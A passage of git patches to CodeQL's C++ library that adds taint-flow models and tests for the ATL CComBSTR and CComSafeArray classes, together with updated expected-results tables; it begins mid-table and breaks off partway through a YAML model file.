| | +| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:487:13:487:17 | ref arg m_str | atl.cpp:490:22:490:26 | m_str | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:490:5:490:6 | b5 | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:491:10:491:11 | b5 | | +| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:491:10:491:11 | b5 | | +| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:490:19:490:20 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:491:10:491:11 | b5 [post update] | atl.cpp:512:3:512:3 | b5 | | +| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:494:5:494:6 | b6 | | +| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:495:10:495:11 | b6 | | +| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:495:10:495:11 | b6 | | +| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:495:10:495:11 | b6 [post update] | atl.cpp:512:3:512:3 | b6 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:498:5:498:6 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:499:10:499:11 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:499:10:499:11 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:502:19:502:20 | b7 | | +| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:499:13:499:17 | ref arg m_str | atl.cpp:502:22:502:26 | m_str | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:502:5:502:6 | b8 | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:503:10:503:11 | b8 | | +| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:503:10:503:11 | b8 | | +| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:502:19:502:20 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | +| atl.cpp:503:10:503:11 | b8 [post update] | atl.cpp:512:3:512:3 | b8 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:507:5:507:6 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:506:15:506:18 | safe | atl.cpp:508:21:508:24 | safe | | +| atl.cpp:506:15:506:18 | safe | atl.cpp:509:10:509:13 | safe | | +| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:508:5:508:6 | b9 | | +| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | +| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:508:21:508:24 | safe [inner post update] | | +| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:509:10:509:13 | safe | | +| atl.cpp:508:21:508:24 | safe | atl.cpp:508:20:508:24 | & ... | | +| atl.cpp:511:10:511:11 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:516:16:516:16 | w | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:520:15:520:15 | w | | +| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:524:20:524:20 | w | | +| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:520:15:520:15 | w | | +| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:524:20:524:20 | w | | +| atl.cpp:516:16:516:16 | w | atl.cpp:516:16:516:17 | call to CComBSTR | TAINT | +| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:517:10:517:10 | b | | +| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:522:3:522:3 | b | | +| atl.cpp:517:10:517:10 | b [post update] | atl.cpp:522:3:522:3 | b | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:520:5:520:6 | b2 | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:521:10:521:11 | b2 | | +| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:521:10:521:11 | b2 | | +| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:520:15:520:15 | ref arg w | atl.cpp:524:20:524:20 | w | | +| atl.cpp:521:10:521:11 | b2 [post update] | atl.cpp:522:3:522:3 | b2 | | +| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | +| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | +| atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 9b004848a32533216fd40602e9acc792437b6e01 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 12:07:01 +0000 Subject: [PATCH 0729/1267] C++: Add MaD model for 'CComBSTR'. --- cpp/ql/lib/ext/CComBSTR.model.yml | 33 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 8 ++--- 2 files changed, 37 insertions(+), 4 deletions(-) create mode 100644 cpp/ql/lib/ext/CComBSTR.model.yml diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml new file mode 100644 index 00000000000..b578956edec --- /dev/null +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -0,0 +1,33 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CComBSTR", True, "CComBSTR", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCOLESTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCSTR)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "Append", "(LPCOLESTR,int)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "AppendBytes", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "AppendBSTR", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ArrayToBSTR", "", "", "Argument[*0].Field[*pvData]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "AssignBSTR", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "Attach", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "BSTRToArray", "", "", "Argument[-1]", "Argument[*0].Field[*pvData]", "value", "manual"] + - ["", "CComBSTR", True, "Copy", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"] + - ["", "CComBSTR", True, "CopyTo", "", "", "Argument[-1]", "Argument[*0]", "value", "manual"] + - ["", "CComBSTR", True, "LoadString", "(HINSTANCE,UINT)", "", "Argument[1]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "LoadString", "(UINT)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "ReadFromStream", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] + - ["", "CComBSTR", True, "WriteToStream", "", "", "Argument[-1]", "Argument[*0]", "taint", "manual"] + - ["", "CComBSTR", True, "operator BSTR", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"] + - ["", "CComBSTR", True, "operator&", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "ReturnValue[*]", "taint", "manual"] + - ["", "CComBSTR", True, "operator+=", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 0eb636082e2..bade135966b 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -479,8 +479,8 @@ void test_CComBSTR() { CComBSTR b3; b3 += x; sink(b3.m_str); // $ MISSING: ir - sink(static_cast(b3)); // $ MISSING: ir - sink(**&b3); // $ MISSING: ir + sink(static_cast(b3)); // $ ir + sink(**&b3); // $ ir CComBSTR b4; b4.Append(source()); @@ -506,9 +506,9 @@ void test_CComBSTR() { SAFEARRAY safe; b9.Append(source()); b9.BSTRToArray(&safe); - sink(safe.pvData); // $ MISSING: ir + sink(safe.pvData); // $ ir - sink(b9.Copy()); // $ MISSING: ir + sink(b9.Copy()); // $ ir } wchar_t* w = indirect_source(); From 948be092575f46d24d37c44e0672181809f11f48 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 13:38:38 +0000 Subject: [PATCH 0730/1267] C++: Add an taint step from object to field for 'CComBSTR's. --- cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../cpp/models/implementations/CComBSTR.qll | 16 ++++++++++++ .../dataflow/taint-tests/atl.cpp | 26 +++++++++---------- 3 files changed, 30 insertions(+), 13 deletions(-) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index bb63416eaef..9e67eaae5cf 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -51,3 +51,4 @@ private import implementations.StructuredExceptionHandling private import implementations.ZMQ private import implementations.Win32CommandExecution private import implementations.CA2AEX +private import implementations.CComBSTR diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll new file mode 100644 index 00000000000..55d18a52ae4 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CComBSTR.qll @@ -0,0 +1,16 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CComBSTR` class from the Microsoft "Active Template Library". */ +class CcomBstr extends Class { + CcomBstr() { this.hasGlobalName("CComBSTR") } +} + +private class Mstr extends Field { + Mstr() { this.getDeclaringType() instanceof CcomBstr and this.hasName("m_str") } +} + +private class MstrTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + MstrTaintInheritingContent() { this.getField() instanceof Mstr } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index bade135966b..c89b649ec9a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -459,14 +459,14 @@ void test_CComBSTR() { char* x = indirect_source(); { CComBSTR b(x); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir CComBSTR b2(b); - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir } { CComBSTR b(10, x); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir } { CComBSTR b(x); @@ -474,33 +474,33 @@ void test_CComBSTR() { CComBSTR b2; sink(b2.m_str); b2 += b; - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir CComBSTR b3; b3 += x; - sink(b3.m_str); // $ MISSING: ir + sink(b3.m_str); // $ ir sink(static_cast(b3)); // $ ir sink(**&b3); // $ ir CComBSTR b4; b4.Append(source()); - sink(b4.m_str); // $ MISSING: ir + sink(b4.m_str); // $ ir CComBSTR b5; b5.AppendBSTR(b4.m_str); - sink(b5.m_str); // $ MISSING: ir + sink(b5.m_str); // $ ir CComBSTR b6; b6.AppendBytes(x, 10); - sink(b6.m_str); // $ MISSING: ir + sink(b6.m_str); // $ ir CComBSTR b7; b7.ArrayToBSTR(getSafeArray()); - sink(b7.m_str); // $ MISSING: ir + sink(b7.m_str); // $ ir CComBSTR b8; b8.AssignBSTR(b7.m_str); - sink(b8.m_str); // $ MISSING: ir + sink(b8.m_str); // $ ir CComBSTR b9; SAFEARRAY safe; @@ -514,14 +514,14 @@ void test_CComBSTR() { wchar_t* w = indirect_source(); { CComBSTR b(w); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir CComBSTR b2; b2.Attach(w); - sink(b2.m_str); // $ MISSING: ir + sink(b2.m_str); // $ ir } { CComBSTR b(10, w); - sink(b.m_str); // $ MISSING: ir + sink(b.m_str); // $ ir } } From e831cb5f2647ff59a98f5c9ea11e15e3dc61ce33 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 13:42:23 +0000 Subject: [PATCH 0731/1267] C++: Add failing tests with 'CComSafeArray'. --- .../dataflow/taint-tests/atl.cpp | 77 +++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 86 +++++++++++++++++++ 2 files changed, 163 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index c89b649ec9a..a91cd9c88d6 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -525,3 +525,80 @@ void test_CComBSTR() { sink(b.m_str); // $ ir } } + +template +struct CComSafeArray { + CComSafeArray(); + CComSafeArray(const SAFEARRAYBOUND& bound); + CComSafeArray(ULONG ulCount, LONG lLBound); + CComSafeArray(const SAFEARRAYBOUND* pBound, UINT uDims); + CComSafeArray(const CComSafeArray& saSrc); + CComSafeArray(const SAFEARRAY& saSrc); + CComSafeArray(const SAFEARRAY* psaSrc); + + ~CComSafeArray() throw(); + + HRESULT Add(const SAFEARRAY* psaSrc); + HRESULT Add(ULONG ulCount, const T* pT, BOOL bCopy); + HRESULT Add(const T& t, BOOL bCopy); + HRESULT Attach(const SAFEARRAY* psaSrc); + HRESULT CopyFrom(LPSAFEARRAY* ppArray); + HRESULT CopyTo(LPSAFEARRAY* ppArray); + HRESULT Create(const SAFEARRAYBOUND* pBound, UINT uDims); + HRESULT Create(ULONG ulCount, LONG lLBound); + HRESULT Destroy(); + LPSAFEARRAY Detach(); + T& GetAt(LONG lIndex) const; + ULONG GetCount(UINT uDim) const; + UINT GetDimensions() const; + LONG GetLowerBound(UINT uDim) const; + LPSAFEARRAY GetSafeArrayPtr() throw(); + LONG GetUpperBound(UINT uDim) const; + bool IsSizable() const; + HRESULT MultiDimGetAt(const LONG* alIndex, T& t); + HRESULT MultiDimSetAt(const LONG* alIndex, const T& t); + HRESULT Resize(const SAFEARRAYBOUND* pBound); + HRESULT Resize(ULONG ulCount, LONG lLBound); + HRESULT SetAt(LONG lIndex, const T& t, BOOL bCopy); + operator LPSAFEARRAY() const; + T& operator[](long lindex) const; + T& operator[](int nindex) const; + + LPSAFEARRAY m_psa; +}; + +void test_CComSafeArray() { + LPSAFEARRAY safe = getSafeArray(); + sink(safe->pvData); // $ ir + { + CComSafeArray c(safe); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + sink(c.m_psa->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + sink(c[0]); + sink(c.GetAt(0)); + sink(c.GetSafeArrayPtr()->pvData); + c.Add(safe); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + sink(static_cast(c)->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + c.Add(source(), true); + sink(c[0]); // $ MISSING: ir + sink(c.GetAt(0)); // $ MISSING: ir + sink(c.GetSafeArrayPtr()->pvData); // $ MISSING: ir + } + { + CComSafeArray c; + c.SetAt(0, source(), true); + sink(c[0]); // $ MISSING: ir + sink(c[0L]); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index becba8e527b..4924d7d817f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -636,6 +636,92 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | | atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:570:8:570:11 | safe | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:572:24:572:27 | safe | | +| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:582:11:582:14 | safe | | +| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:572:24:572:27 | safe | | +| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:582:11:582:14 | safe | | +| atl.cpp:572:24:572:27 | safe | atl.cpp:572:24:572:28 | call to CComSafeArray | TAINT | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:573:8:573:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:574:8:574:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | +| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:576:3:576:3 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:574:8:574:8 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:575:8:575:8 | c | | +| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:575:8:575:8 | c | | +| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:3:576:3 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:579:10:579:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:580:10:580:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:581:10:581:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:582:5:582:5 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:586:35:586:35 | c | | +| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:587:3:587:3 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:580:10:580:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:581:10:581:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:582:5:582:5 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:35:586:35 | c | | +| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:586:35:586:35 | ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:590:5:590:5 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:591:10:591:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:592:10:592:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:593:10:593:10 | c | | +| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:594:3:594:3 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:591:10:591:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:592:10:592:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:592:10:592:10 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:593:10:593:10 | c | | +| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:593:10:593:10 | ref arg c | atl.cpp:594:3:594:3 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:597:5:597:5 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:598:10:598:10 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:599:10:599:10 | c | | +| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:600:3:600:3 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:598:10:598:10 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:599:10:599:10 | c | | +| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:599:10:599:10 | c | | +| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:599:10:599:10 | ref arg c | atl.cpp:600:3:600:3 | c | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 5f05417890733959f4bb89c0b2d765370578fab9 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:10:04 +0000 Subject: [PATCH 0732/1267] C++: Add MaD model for 'CComSafeArray'. --- cpp/ql/lib/ext/CComSafeArray.model.yml | 27 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 26 +++++++++--------- 2 files changed, 40 insertions(+), 13 deletions(-) create mode 100644 cpp/ql/lib/ext/CComSafeArray.model.yml diff --git a/cpp/ql/lib/ext/CComSafeArray.model.yml b/cpp/ql/lib/ext/CComSafeArray.model.yml new file mode 100644 index 00000000000..4128ae13e17 --- /dev/null +++ b/cpp/ql/lib/ext/CComSafeArray.model.yml @@ -0,0 +1,27 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CComSafeArray", True, "CComSafeArray", "(const CComSafeArray &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY &)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CComSafeArray", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "Add", "(const SAFEARRAY *)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "Add", "(const T &,BOOL)", "", "Argument[*@0]", "Argument[-1].Field[*m_psa].Field[*@pvData]", "value", "manual"] + - ["", "CComSafeArray", True, "Attach", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CopyFrom", "", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "CopyTo", "", "", "Argument[-1].Field[*m_psa]", "Argument[*0]", "value", "manual"] + - ["", "CComSafeArray", True, "Create", "(const SAFEARRAYBOUND *,UINT)", "", "Argument[*0]", "Argument[-1].Field[*m_psa]", "value", "manual"] + - ["", "CComSafeArray", True, "GetAt", "", "", "Argument[-1].Field[*m_psa].Field[*@pvData]", "ReturnValue[*@]", "value", "manual"] + - ["", "CComSafeArray", True, "GetLowerBound", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CComSafeArray", True, "GetSafeArrayPtr", "", "", 